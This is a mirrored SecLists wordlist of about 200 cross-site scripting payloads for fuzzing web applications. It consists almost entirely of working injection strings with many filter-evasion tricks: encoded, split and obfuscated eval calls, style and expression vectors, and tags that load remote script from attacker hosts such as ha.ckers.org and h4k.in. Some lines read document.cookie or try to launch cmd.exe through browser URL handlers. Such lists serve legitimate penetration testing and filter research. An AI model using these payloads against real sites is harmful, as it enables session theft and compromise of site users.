mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-05-12 15:21:53 -04:00
206 lines
No EOL
14 KiB
Text
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
|
|
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
|
|
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
|
|
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
|
|
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
|
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
|
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>
|
|
<div style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
|
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
|
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
|
|
<BASE HREF="javascript:alert('XSS');//">
|
|
`> <script>alert(5)</script>
|
|
> <script>alert(4)</script>
|
|
xyz onerror=alert(6);
|
|
1;a=eval;b=alert;a(b(/c/.source));
|
|
1];a=eval;b=alert;a(b(17));//
|
|
];a=eval;b=alert;a(b(16));//
|
|
'];a=eval;b=alert;a(b(15));//
|
|
1};a=eval;b=alert;a(b(14));//
|
|
'};a=eval;b=alert;a(b(13));//
|
|
};a=eval;b=alert;a(b(12));//
|
|
a=1;a=eval;b=alert;a(b(11));//
|
|
;//%0da=eval;b=alert;a(b(10));//
|
|
';//%0da=eval;b=alert;a(b(9));//
|
|
'> <script>alert(3)</script>
|
|
</title><script>alert(1)</script>
|
|
<BGSOUND SRC="javascript:alert('XSS');">
|
|
<BODY BACKGROUND="javascript:alert('XSS');">
|
|
<BODY ONLOAD=alert('XSS')>
|
|
<!--<A href="- --><a href=javascript:alert:document.domain>test-->
|
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
|
|
<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script>
|
|
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
|
|
*/a=eval;b=alert;a(b(/e/.source));/*
|
|
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
|
|
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
<DIV STYLE="width: expression(alert('XSS'));">
|
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
|
<A HREF="http://1113982867/">XSS</A>
|
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
\";alert('XSS');//
|
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
eval(name)
|
|
<A HREF="http://www.google.com./">XSS</A>
|
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<A HREF="//google">XSS</A>
|
|
<A HREF="http://ha.ckers.org@google">XSS</A>
|
|
<A HREF="http://google:ha.ckers.org">XSS</A>
|
|
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert("XSS")>
|
|
'';!--"<script>alert(0);</script>=&{(alert(1))}
|
|
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
|
|
<img src=`x` onrerror= ` ;; alert(1) ` />
|
|
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
|
|
style=color: expression(alert(0));" a="
|
|
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
|
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
|
|
<IMG SRC="jav	ascript:alert(<WBR>'XSS');">
|
|
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
|
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
|
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
|
|
<IMG DYNSRC="javascript:alert('XSS');">
|
|
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
<IMG LOWSRC="javascript:alert('XSS');">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
<A HREF="http://66.102.7.147/">XSS</A>
|
|
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
|
|
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
|
|
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
|
|
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
|
|
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
|
|
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
|
|
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
|
|
<BR SIZE="&{alert('XSS')}">
|
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
|
%0da=eval;b=alert;a(b(/d/.source));
|
|
<a href = "javas cript :ale rt(1)">test
|
|
+alert(0)+
|
|
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
|
|
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
|
|
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
|
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
|
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
|
<IMG SRC="livescript:[code]">
|
|
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
|
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
<A HREF="http://6	6.000146.0x7.147/">XSS</A>
|
|
<IMG SRC="mocha:[code]">
|
|
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
|
|
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
|
|
<IMGSRC="javascript:alert('XSS')">
|
|
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
|
|
a=/ev/// .source a+=/al/// .source a[a] (name)
|
|
a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
|
|
setTimeout//
|
|
(name// ,0)
|
|
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
|
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
|
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>
|
|
</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
|
|
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
|
|
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
|
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
|
|
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
|
|
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
|
|
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
|
|
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
|
|
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
|
|
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
|
|
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
|
|
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
|
|
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
|
|
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
|
|
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
|
|
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
|
|
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
|
|
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
|
|
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
|
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d);
|
|
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
|
open(name)
|
|
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
alert(1)
|
|
<A HREF="//www.google.com/">XSS</A>
|
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
0%0d%0a%00<script src=//h4k.in>
|
|
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
|
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|
<A HREF="http://google.com/">XSS</A>
|
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
|
<SCRIPT>alert('XSS')</SCRIPT>
|
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
|
|
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
|
|
eval.call(this,unescape.call(this,location))
|
|
d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
|
|
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
|
|
_=eval,__=unescape,___=document.URL,_(__(___))
|
|
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
|
|
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
|
|
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
|
|
with(location)with(hash)eval(substring(1))
|
|
<IMG SRC="  javascript:alert('XSS');">
|
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script>
|
|
eval(eval(document.styleSheets[0].cssRules[0].style.content))
|
|
</script>
|
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
|
|
>"'
|
|
a=alert;a(0)
|
|
A=alert;A(1)
|
|
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
|
</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
|
|
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
|
|
http://aa"><script>alert(123)</script>
|
|
http://aa'><script>alert(123)</script>
|
|
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> |